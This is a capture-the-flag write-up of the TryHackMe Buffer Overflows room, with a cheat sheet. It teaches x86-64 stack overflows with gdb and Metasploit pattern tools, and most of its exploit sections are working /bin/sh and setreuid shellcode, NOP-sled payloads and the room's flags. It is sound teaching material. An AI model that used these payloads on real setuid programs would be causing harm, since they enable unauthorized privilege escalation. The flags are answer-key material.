Buffer Overflows - TryHackMe

Published at: Apr 19, 2024

Learn how to get started with basic Buffer Overflows on x86-64 linux programs!

Goal

The goal is to explore simple stack overflows on x86-64 linux programs using gdb.

Cheat Sheet

Before we begin, as always there is a generic Cheat Sheet for this room which could be integrated in your own notes. You can find it at the bottom of this write-up. You can also find all of my notes at https://hailstormsec.com/posts/categories/notes.

Tasks

Process Layout

Memory showing the stack and heap

  • Heap: Memory set aside for dynamically allocated data.
  • Stack: Information required to run the program - registers, functions, arguments, etc.

Below is an image to visualise the difference:

Heap vs stack

Question(s)

  1. Where is dynamically allocated memory stored?
  2. Where is information about functions (e.g. local arguments) stored?

Answer(s)

  1. Heap
  2. Stack

x86-64 Procedures

Stack operations:

  • Pushing: add data onto the stack
  • Popping: remove data from the stack

Examples:

  • push var - push value onto stack
    • Uses var or value stored in memory location of var
    • Decrements the stack pointer (rsp) by 8
    • Writes above value to new location of rsp which is now at the top of the stack
Stack before push
Stack after push
  • pop var - read value and pop it off the stack
    • Reads the value at the address given by the stack pointer (rsp)
    • Increments the stack pointer (rsp) by 8
    • Stores the value that was read into var
Stack before pop
Stack after pop
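
To make the push and pop steps above concrete, here is a small toy model in Python. It is only a sketch: the class name `ToyStack` and the starting address are made up for illustration, and real memory is of course not a dictionary. It just shows rsp moving down by 8 on push and back up by 8 on pop.

```python
class ToyStack:
    """Toy model of the x86-64 stack: rsp moves down on push, up on pop."""

    WORD = 8  # bytes per 64-bit stack slot

    def __init__(self, top=0x7FFFFFFFE000):  # hypothetical starting address
        self.rsp = top
        self.memory = {}  # address -> value, stands in for real memory

    def push(self, value):
        self.rsp -= self.WORD          # rsp is decremented by 8 first
        self.memory[self.rsp] = value  # then the value is written at the new rsp

    def pop(self):
        value = self.memory.pop(self.rsp)  # read the value rsp points at
        self.rsp += self.WORD              # then rsp is incremented by 8
        return value


stack = ToyStack()
start = stack.rsp
stack.push(4)
stack.push(5)
print(hex(start), hex(stack.rsp))  # rsp is now 16 bytes lower than at the start
print(stack.pop(), stack.pop())    # values come back in reverse order
```

Note how the last value pushed is the first one popped, and how the "top" of the stack is the lowest address in use.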

Frames:

  • Allocates a "frame" once a function is called.
  • Used to store the function variables, arguments etc.
  • Deallocated once function is complete.
Stack displaying 3 frames

Question(s)

  1. What direction does the stack grow (l for lower/h for higher)?
  2. What instruction is used to add data onto the stack?

Answer(s)

  1. l (The top of the stack, at the lower addresses, is drawn at the bottom - thus the stack grows lower)
  2. Push

Procedures Continued

Let us better understand assembly and memory using this example:

C code

int add(int a, int b){
   int new = a + b;
   return new;
}

int calc(int a, int b){
   int final = add(a, b);
   return final;
}

calc(4, 5)

x86-64 assembly:

calc.png
calc function
add.png
add function

Terms:

  • Caller: The function calling another function - calc.
  • Callee: The function being called by another function - add. In assembly, they are called using call, or callq.
  • Return: At the end of a function it will return with retq.

Registers (store arguments):

| 64-bit | 32-bit | 16-bit | 8-bit | Special purpose for functions | When calling a function | When writing a function |
| --- | --- | --- | --- | --- | --- | --- |
| rax | eax | ax | ah,al | Return value | Might be changed | Use freely |
| rbx | ebx | bx | bh,bl | | Will not be changed | Save before using! |
| rcx | ecx | cx | ch,cl | 4th integer argument | Might be changed | Use freely |
| rdx | edx | dx | dh,dl | 3rd integer argument | Might be changed | Use freely |
| rsi | esi | si | sil | 2nd integer argument | Might be changed | Use freely |
| rdi | edi | di | dil | 1st integer argument | Might be changed | Use freely |
| rbp | ebp | bp | bpl | Frame pointer | Maybe be careful | Maybe be careful |
| rsp | esp | sp | spl | Stack pointer | Be very careful! | Be very careful! |
| r8 | r8d | r8w | r8b | 5th integer argument | Might be changed | Use freely |
| r9 | r9d | r9w | r9b | 6th integer argument | Might be changed | Use freely |
| r10 | r10d | r10w | r10b | | Might be changed | Use freely |
| r11 | r11d | r11w | r11b | | Might be changed | Use freely |
| r12 | r12d | r12w | r12b | | Will not be changed | Save before using! |
| r13 | r13d | r13w | r13b | | Will not be changed | Save before using! |
| r14 | r14d | r14w | r14b | | Will not be changed | Save before using! |
| r15 | r15d | r15w | r15b | | Will not be changed | Save before using! |

"Might be changed" = "Caller saved"; "Will not be changed" = "Callee saved". - https://math.hws.edu/eck/cs220/f22/registers.html


Question(s)

What register stores the return address?

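Answer(s)

rax (strictly speaking, rax holds the function's return value; the return address itself is stored on the stack)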


Endianness

  • LSB: Least Significant Byte
  • MSB: Most Significant Byte
Little endian order
Little Endian - 0x12345678
big-endian.png
Big Endian - 0x12345678
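
The two byte orders pictured above can be reproduced with Python's built-in `int.to_bytes`. This is just a quick illustration using the same example value, 0x12345678, stored in 4 bytes.

```python
value = 0x12345678

little = value.to_bytes(4, "little")  # LSB (0x78) is stored first
big = value.to_bytes(4, "big")        # MSB (0x12) is stored first

print(little.hex(" "))  # 78 56 34 12
print(big.hex(" "))     # 12 34 56 78

# Reading the bytes back with the matching byte order restores the value.
assert int.from_bytes(little, "little") == value
assert int.from_bytes(big, "big") == value
```

x86-64 is little-endian, which is why addresses have to be written "backwards" in the payloads later in this write-up.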

Overwriting Variables

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int variable = 0;
  char buffer[14];

  gets(buffer);

  if(variable != 0) {
      printf("You have changed the value of the variable\n");
  } else {
      printf("Try again?\n");
  }
}

Question(s)

What is the minimum number of characters needed to overwrite the variable?

Assuming that the compiler doesn't add padding after the 14-byte buffer, we simply need to write one byte past those 14 bytes. Keep in mind that the buffer is filled toward higher addresses, so once the buffer is full the extra characters spill into the variable stored next to it.

Answer(s)

15
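
Why 15 and not 14? The sketch below simulates the stack frame in Python under the same assumption as above: the 4-byte variable sits directly after the 14-byte buffer with no padding. The helper `fake_gets` is a made-up stand-in for gets(), which copies the input plus a terminating NUL byte without any bounds check.

```python
BUF_SIZE = 14


def fake_gets(frame, data):
    """Copy data plus a trailing NUL into the frame with no bounds check."""
    payload = data + b"\x00"
    frame[0:len(payload)] = payload


def variable_after_input(n):
    """Return the value of the variable after feeding n 'A' characters."""
    frame = bytearray(32)  # assumed layout: buffer at [0:14], variable at [14:18]
    fake_gets(frame, b"A" * n)
    return int.from_bytes(frame[BUF_SIZE:BUF_SIZE + 4], "little")


for n in (13, 14, 15):
    print(n, hex(variable_after_input(n)))
```

With 14 characters only the terminating NUL lands in the variable, so it stays 0. The 15th character is the first one that changes it.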


Overwriting Function Pointers

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

void special()
{
    printf("this is the special function\n");
    printf("you did this, friend!\n");
}

void normal()
{
    printf("this is the normal function\n");
}

void other()
{
    printf("why is this here?");
}

int main(int argc, char **argv)
{
    volatile int (*new_ptr) () = normal;
    char buffer[14];
    gets(buffer);
    new_ptr();
}

Here we want to overflow the pointer so that it points to the special function instead. First we need to find where special is located in memory, which we can do with gdb. Start with gdb func-pointer.

Special function in memory
Starts at 0x0000000000400567

Now we can run the program inside gdb to see how many characters we can use for the buffer overflow. Since the buffer variable is 14 bytes long, we should start overflowing at that point. However, there might be some padding, so we start with 15 characters and increase by 1 until we have reached the limit.

20v21.png
The limit is 20 (hex for 'A' is 41)

This means we have 6 bytes to work with (two hex digits make one byte). Because of little-endian, we need to print the LSB (Least Significant Byte) first and then pad with null bytes (\x00) to reach our 6 bytes:

\x67\x05\x40\x00\x00\x00

So to instead point the function to the special function we run the following:

python -c "print('A'*14 + '\x67\x05\x40\x00\x00\x00')" | ./func-pointer
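
If you prefer not to reverse the bytes by hand, `struct.pack` can do it for you. The sketch below rebuilds the same payload; the address 0x400567 and the 14-byte padding come from this write-up, while the function name `build_payload` is just something I made up for the example.

```python
import struct

SPECIAL_ADDR = 0x400567  # address of special() from the gdb output above
BUF_SIZE = 14            # size of buffer in the source code


def build_payload(addr, pad=BUF_SIZE, ptr_bytes=6):
    """Padding to fill the buffer, then the lowest ptr_bytes of the address."""
    packed = struct.pack("<Q", addr)  # 8 bytes, little-endian (LSB first)
    return b"A" * pad + packed[:ptr_bytes]


payload = build_payload(SPECIAL_ADDR)
print(payload)
print(len(payload))  # 20
```

The "<Q" format means "little-endian unsigned 64-bit", so the bytes come out already in the order the program expects.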

Buffer Overflows

The program:

#include <stdio.h>
#include <stdlib.h>

void copy_arg(char *string)
{
    char buffer[140];
    strcpy(buffer, string);
    printf("%s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    printf("Here's a program that echo's out your input\n");
    copy_arg(argv[1]);
}

The shellcode to open a shell:

\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x11\x48\xc1\xe1\x08\x48\xc1\xe9\x08\x51\x48\x8d\x3c\x24\x48\x31\xd2\xb0\x3b\x0f\x05

No Operations (NOP) slide:

  • NOP: \x90
  • To avoid having to find the exact place in memory where our shellcode is located, we prepend NOPs: execution slides through them until it reaches the shellcode placed after them.
  • It also deals with the problem of memory addresses not being the same from one run to another (as long as they only shift by a few bytes).
Nop slide
NOP sled -> Shellcode -> Memory address (to point execution to the shellcode)
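
The idea of the sled can be shown with a tiny simulation. This is not how a CPU works internally, just a sketch: the function `land` is hypothetical and the four `\xcc` bytes are placeholders standing in for real shellcode.

```python
NOP = 0x90


def land(memory, start):
    """Return the index where execution first hits a non-NOP byte."""
    pc = start
    while memory[pc] == NOP:  # a NOP does nothing, so just move on
        pc += 1
    return pc


sled_len = 100
shellcode = b"\xcc" * 4  # placeholder bytes, not real shellcode
memory = bytes([NOP]) * sled_len + shellcode

# Jumping anywhere inside the sled ends up at the start of the shellcode.
for start in (0, 37, 99):
    print(start, "->", land(memory, start))
```

So the return address does not have to be exact: any address inside the sled is good enough.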

Finding the offset

Manually

For this exercise we will once again use gdb to find the offset (the point where we start to overflow into the return address). Looking at the source code, we know the buffer is 140 bytes long. However, there will be saved registers in between the buffer and the return address.

memory-layout.png

So to find the offset we need to go higher than 140 bytes, looking for `\x41` (hex value of 'A') in the return address to see when we overflow.

offset.png
run $(python -c "print('A'*158)")

With 6 bytes as the return address, the offset is 152.

We can also find the same 6 bytes by running i r (info registers).

We can see rip with the return address
Red: Return address, Orange: We also overflowed rbp

With Metasploit

We can utilise pattern_create and pattern_offset in metasploit to find the offset in a more automatic manner.

Start by using pattern_create:

Using pattern create tool
-l: length - set to 200 since we know it will at least be larger than 140

Could not find 'rex-text'

Edit the file and change the shebang:

Rex-text fix with editing shebang

Now we want to run the program again with the generated string (`run 'STRING'`). Then we can inspect the registers with `i r`:

We cannot see what is inside rip, but we know rbp is before
We cannot read what's inside the return address (rip), but we know rbp is right before the return address

By copying these 8 bytes (64-bits) and running pattern_offset we will get the offset to the rbp, but to get the offset for rip we need to add the 8 bytes of the rbp.

rbp offset + rbp size (8) = rip offset

Running pattern_offset will give us the rbp offset
rbp offset: 144

This gives us: 144+8=152


Crafting our payload

Utilising a NOP sled in front of the payload given to us by the task should ensure that it gets executed.

NOP sled + payload + padding + address of payload = 152 + address of payload

https://www.arsouyes.org/blog/2019/54_Shellcode/

shellcode = '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'
'\x90'*100 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*12 + 'B'*6

100 + 40 (payload length) + 12 + 6 = 152 + 6

This should give us all B:s (\x42) if run.

With our payload we got the result we wanted
Perfect, it works!

Now the only thing we need is the address of our payload (or anywhere on the sled). To do this we will examine the memory:

x/100x $rsp-200
  • x/: examine
  • 100: Number of units to display (4-byte words by default)
  • x: display hex
  • $rsp: the stack pointer register, which should be near where the function returns
  • -200: Start 200 bytes before that address
Examined memory
We will use 0x7fffffffe948 to make sure we land on the NOP sled

However with little-endian, we will need to print the bytes in reverse, making the payload:

'\x90'*100 + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*12 + '\x48\xe9\xff\xff\xff\x7f'
shell-wrong-user.png

We got a shell!! ... but as the wrong user.
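
To double check the arithmetic of the payload used above, here is a sketch that assembles it in Python and verifies the layout. The offset (152), the shellcode and the address 0x7fffffffe948 are taken from this write-up; the helper name `build` is my own. Only the lower 6 bytes of the address are used, because the upper two are zero and a NUL byte cannot be passed inside a command-line argument.

```python
import struct

OFFSET = 152               # bytes before the return address
RET_ADDR = 0x7FFFFFFFE948  # address inside the NOP sled, from gdb
SHELLCODE = bytes.fromhex(
    "6a3b584831d249b82f2f62696e2f7368"
    "49c1e80841504889e752574889e60f05"
    "6a3c584831ff0f05"
)


def build(sled_len, shellcode, offset, ret_addr):
    """NOP sled + shellcode + padding up to the offset + return address."""
    pad_len = offset - sled_len - len(shellcode)
    if pad_len < 0:
        raise ValueError("sled and shellcode do not fit before the return address")
    ret = struct.pack("<Q", ret_addr)[:6]  # little-endian, drop the two zero bytes
    return b"\x90" * sled_len + shellcode + b"A" * pad_len + ret


payload = build(100, SHELLCODE, OFFSET, RET_ADDR)
print(len(SHELLCODE), len(payload))  # 40 158
print(payload[OFFSET:].hex())        # 48e9ffffff7f
```

Letting the script compute the padding means the sled length can be changed later without redoing the math by hand.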


Setuid, setreuid and editing the payload

We get a shell as user1 because we launched the process with our own user ID. To receive the shell as user2, we need to run it with their effective user ID:

  1. User ID (UID):

    • The UID is a numerical identifier assigned to each user on the system.
    • It is a unique value associated with a user account and is used by the system to distinguish between different users.
    • When a user logs in, their processes are initially assigned the UID of the user account.
  2. Effective User ID (EUID):

    • The EUID is another numerical identifier associated with a process.
    • While a process is running, its EUID may be different from its UID.
    • The EUID is used to determine the effective permissions of a process when accessing resources, such as files or other system services.
    • Changing the EUID allows a process to temporarily escalate or reduce its privileges.

First we need the user id of user2 - we do so by reading /etc/passwd:

Uid of user2 is 1002
cat /etc/passwd
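
The same lookup can be scripted. The sketch below parses /etc/passwd-style text, where the third colon-separated field is the UID. The sample lines are hypothetical: only the name user2 and its UID 1002 come from this write-up, everything else (including user1's UID) is invented for the example. It also prints the real and effective UID of the current Python process to show the two values discussed above.

```python
import os


def uid_from_passwd(passwd_text, username):
    """Return the numeric UID for username from passwd-style text, or None."""
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 3 and fields[0] == username:
            return int(fields[2])  # name:password:UID:GID:...
    return None


# Hypothetical sample entries, not copied from the target machine.
sample = (
    "user1:x:1001:1001::/home/user1:/bin/bash\n"
    "user2:x:1002:1002::/home/user2:/bin/bash\n"
)

print(uid_from_passwd(sample, "user2"))
print(os.getuid(), os.geteuid())  # real and effective UID of this process
```

On the target you would pass the contents of the real /etc/passwd instead of the sample string.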

Now we need to add a call to our shellcode that changes the EUID. We will generate it with pwntools.

Install pwntools (run as root):

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

Pwntools is a CTF framework and exploit development library that can, among other things, generate many kinds of shellcode. To generate what we want, I will run the following command.

pwn shellcraft -f d amd64.linux.setreuid 1002
  • shellcraft: Craft shell code
  • -l: List available shellcodes
  • -f: Format (d: escaped hex string)
  • 1002: UID

This gave me the following: \x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05 (14)
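
As a sanity check, we can confirm that the generated bytes really contain our UID. In this particular output the UID is loaded with a `mov di, imm16` instruction (opcode bytes 66 bf), followed by the value in little-endian. The helper `embedded_uid` below is a sketch that only works for shellcode shaped like this one; pwntools may encode other values differently.

```python
SETREUID_1002 = bytes.fromhex("31ff66bfea036a71584889fe0f05")


def embedded_uid(shellcode):
    """Read the 16-bit immediate that follows the 66 bf (mov di, imm16) opcode."""
    i = shellcode.index(b"\x66\xbf")  # raises ValueError if the opcode is absent
    return int.from_bytes(shellcode[i + 2:i + 4], "little")


print(len(SETREUID_1002))           # 14
print(embedded_uid(SETREUID_1002))  # 1002
```

The bytes \xea\x03 are 0x03ea read in little-endian, which is 1002 in decimal.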

Now prepend this to our shellcode. Remember that we have to shorten the NOP sled by the size of the added shellcode.

'\x90'*86 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*12 + '\x48\xe9\xff\xff\xff\x7f'
It worked - we have a shell as user2

Answer(s)

omgyoudidthissocool!!


Buffer Overflows 2

#include <stdio.h>
#include <stdlib.h>

void concat_arg(char *string)
{
    char buffer[154] = "doggo";
    strcat(buffer, string);
    printf("new word is %s\n", buffer);
    return 0;
}

int main(int argc, char **argv)
{
    concat_arg(argv[1]);
}

It is very similar to the last task. Let's start with finding the offset.

buffer (154) + saved register = offset

Generate a pattern to find the offset with pattern_create:

┌──(Hailst0rm(ソフ)sec)-[~]
└─$ /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
Running pattern in gdb to find offset
Register: 0x4133664132664131

Now use pattern_offset to find the offset:

┌──(Hailst0rm(ソフ)sec)-[~]
└─$ /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 200 -q 4133664132664131
[*] Exact match at offset 155

Register offset + register length = return offset => 155 + 8 = 163
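
If Metasploit is not available, the lookup can be approximated in a few lines of Python. This is a sketch, not the Metasploit implementation: it only assumes the Aa0Aa1Aa2... pattern shape visible in the output above, and both function names are borrowed from the tools purely for readability. The register value is converted to bytes in little-endian order before searching.

```python
import string


def pattern_create(length):
    """Build an Aa0Aa1Aa2... pattern of the requested length."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(length, value):
    """Find where a 64-bit register value occurs in the pattern, or -1."""
    needle = value.to_bytes(8, "little").decode("ascii")  # register bytes as text
    return pattern_create(length).find(needle)


register_offset = pattern_offset(200, 0x4133664132664131)
print(register_offset)      # 155
print(register_offset + 8)  # 163, the offset of the return address
```

The value 0x4133664132664131 becomes the text "1Af2Af3A", which starts at position 155 in the pattern.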

We can try this offset to confirm:

Our calculation of 163 is correct
run $(python -c "print('A'*163 + 'B'*6)") - 42 is hex for 'B'

We can use the same shellcode as in the previous task - however we need to generate a new shellcode for the EUID.

pwn shellcraft -f d amd64.linux.setreuid 1003
\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05

Now simply do some math to make sure you use the offset. NOP sled + shellcode + padding = 163 => 90 + 54 + 19 = 163.

'\x90'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*19 + 'B'*6

Now we run this in gdb to find the memory address of our shellcode.

On the row before the payload we find the nop sled
0x7fffffffe924, you see the shellcode on the next row

Now simply replace the B:s with the address found. Remember that the system uses little-endian.

'\x90'*90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A'*19 + '\x24\xe9\xff\xff\xff\x7f'
Use your payload and you are user3
We got the last flag!

Answer(s)

wowanothertime!!

Final comment

This was my first attempt at buffer overflows, so some explanations may be unclear or even wrong. However, I hope that this writeup has helped you in some way, shape, or form.

I also want to shout out this writeup, which goes a bit deeper into the different steps: https://l1ge.github.io/tryhackme_bof1/


Cheat Sheet

You can also find all of the following under the notes category.

Terms

| Term | Definition |
| --- | --- |
| Heap | Memory set aside for dynamically allocated data |
| Stack | Information required to run the program - registers, functions, arguments, etc. |
| Push | Operation to add data onto the stack |
| Pop | Operation to remove data from the stack |
| Frame | Allocated when a function is called and used to store that function's variables, arguments, etc. Deallocated once the function completes. |
| Caller | The function that calls another function. |
| Callee | The function that gets called by another function. |
| LSB | Least Significant Byte |
| MSB | Most Significant Byte |
| Little Endian | LSB first |
| Big Endian | MSB first |
| NOP sled | No Operation sled: the program keeps executing without performing any action. Good as a buffer leading up to the shellcode. |
stack-vs-heap.png
Stack vs Heap
Little endian example
Little Endian - 0x12345678

x86-64

Registers

| 64-bit | 32-bit | 16-bit | 8-bit | Special purpose for functions | When calling a function | When writing a function |
| --- | --- | --- | --- | --- | --- | --- |
| rax | eax | ax | ah,al | Return value | Might be changed | Use freely |
| rbx | ebx | bx | bh,bl | | Will not be changed | Save before using! |
| rcx | ecx | cx | ch,cl | 4th integer argument | Might be changed | Use freely |
| rdx | edx | dx | dh,dl | 3rd integer argument | Might be changed | Use freely |
| rsi | esi | si | sil | 2nd integer argument | Might be changed | Use freely |
| rdi | edi | di | dil | 1st integer argument | Might be changed | Use freely |
| rbp | ebp | bp | bpl | Frame pointer | Maybe be careful | Maybe be careful |
| rsp | esp | sp | spl | Stack pointer | Be very careful! | Be very careful! |
| r8 | r8d | r8w | r8b | 5th integer argument | Might be changed | Use freely |
| r9 | r9d | r9w | r9b | 6th integer argument | Might be changed | Use freely |
| r10 | r10d | r10w | r10b | | Might be changed | Use freely |
| r11 | r11d | r11w | r11b | | Might be changed | Use freely |
| r12 | r12d | r12w | r12b | | Will not be changed | Save before using! |
| r13 | r13d | r13w | r13b | | Will not be changed | Save before using! |
| r14 | r14d | r14w | r14b | | Will not be changed | Save before using! |
| r15 | r15d | r15w | r15b | | Will not be changed | Save before using! |

"Might be changed" = "Caller saved"; "Will not be changed" = "Callee saved". - https://math.hws.edu/eck/cs220/f22/registers.html

Finding the Offset

Metasploit

  1. Copy into path:
sudo cp "$(locate pattern_create.rb)" /usr/local/bin
sudo cp "$(locate pattern_offset.rb)" /usr/local/bin
  2. Use pattern_create to generate a pattern.
  3. Run program with said input.
  4. Use GDB to find offset address.
  5. Run pattern_offset to get the offset value.
pattern_create.rb -l 200
pattern_offset.rb -l 200 -q 4133664132664131
  • -l: Length
  • -q: Query

Could not find 'rex-text'

Edit the file and change the shebang:

Fix rex-fix error

GDB

Disassemble:

disassemble FUNCTION_NAME

Inspect registers:

i r

Examine memory:

x/100x $rsp-200
  • x/: examine
  • 100: Number of units to display (4-byte words by default)
  • x: display hex
  • $rsp: the stack pointer register, which should be near where the function returns
  • -200: Start 200 bytes before that address

Crafting shellcode

Pwntools

Install pwntools (run as root):

apt-get update
apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools

Set EUID (effective uid):

pwn shellcraft -f d amd64.linux.setreuid 1002
  • shellcraft: Craft shell code
  • -l: List available shellcodes
  • -f: Format (d: escaped hex string)
  • 1002: UID

x86-64 shell

https://www.arsouyes.org/blog/2019/54_Shellcode/

shellcode = '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'
